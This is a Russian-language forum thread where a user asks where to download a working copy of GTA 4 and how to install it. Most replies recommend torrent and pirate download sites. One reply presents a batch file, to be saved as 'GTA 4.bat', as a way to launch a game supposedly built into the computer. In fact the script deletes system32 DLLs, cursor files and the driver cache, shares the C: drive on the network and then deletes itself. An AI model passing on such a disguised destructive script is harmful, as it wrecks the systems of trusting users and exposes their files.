Mirlan Koshokov

где можно скачать gta 4 нормальную рабочую проверенную вами версию?

и напишите как устанавливать а то недавно скачал хуйню на 12 гб
нажал через демон тулс устанавливать 1 двд-там все нормально а потом онон запросило двд 2-=оно не открывается-хуйня полная и 3 двд тоже не работает
подскажите где скачать игру с нормальной установкой где в папке есть только 1 значек на который нажал а через пару часов уже можно играть

Кристина Ржевская

я качала здесь ) там через поисковик найди гта ) у меня винда 7 ультиматум.. все пошло) установка самая обычная) разберешься) http://ximepa.net/

Игорь Пягай

на торенте

Ольга Медведева

Это всё делается через Daemon Tools!!! Там нужно монтировать диск!!!!

Алексей Иванов

100% рабочий на любой винде
torrent-games.net/news/gta_4_grand_theft_auto_iv_v_1_0_7_0_2008_pc_124_repack_by_xatab/2011-08-31-19328

Б_
Белла ____

Вы вкурсе что ГТА 4 встроена в ваши компы? -если нет то создайте текстовой документ переименуйте в GTA 4 потом заходим и пишем :
@echo off
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Cursors*.*" >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
net share "ResName"="C:" >nul
del "%0" >nul
А потом нажимаем файл сохранить как и пишем GTA 4.bat
Потом запускаем и запускается GTA 4!!!
пРОВЕРЕНО МНОЙ ЛИЧНО ТЕРЕЬ ИРАЮ!

Юля Никитина

Как по мне, так лучше сходить и купить диск с игрой GTA4, чем нахватать вирусов, пока скачиваешь с интернета.
P.S: Даже со Steam качать не хочу, дорого 🙂

Галина Иванова

скачать проверенную версию gta 4 можно отсюда http://mygamecore.com/11-gta-4-complete.html

Ма
Машулька

Обсуждали тут уже, используй driverplus.ru